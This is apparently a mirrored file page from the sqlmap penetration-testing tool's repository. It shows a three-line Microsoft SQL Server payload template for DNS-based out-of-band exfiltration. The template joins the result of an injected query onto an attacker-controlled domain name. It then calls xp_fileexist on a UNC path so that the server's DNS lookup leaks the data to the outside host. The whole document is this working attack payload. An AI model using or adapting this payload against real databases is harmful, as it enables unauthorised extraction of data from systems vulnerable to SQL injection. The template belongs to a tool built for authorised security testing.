mirror of
https://github.com/sqlmapproject/sqlmap
synced 2025-12-09 09:52:35 +01:00
3 lines
118 B
Text
3 lines
118 B
Text
DECLARE @host varchar(1024);
|
|
SELECT @host = (%QUERY%) + '.%DOMAIN%';
|
|
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');
|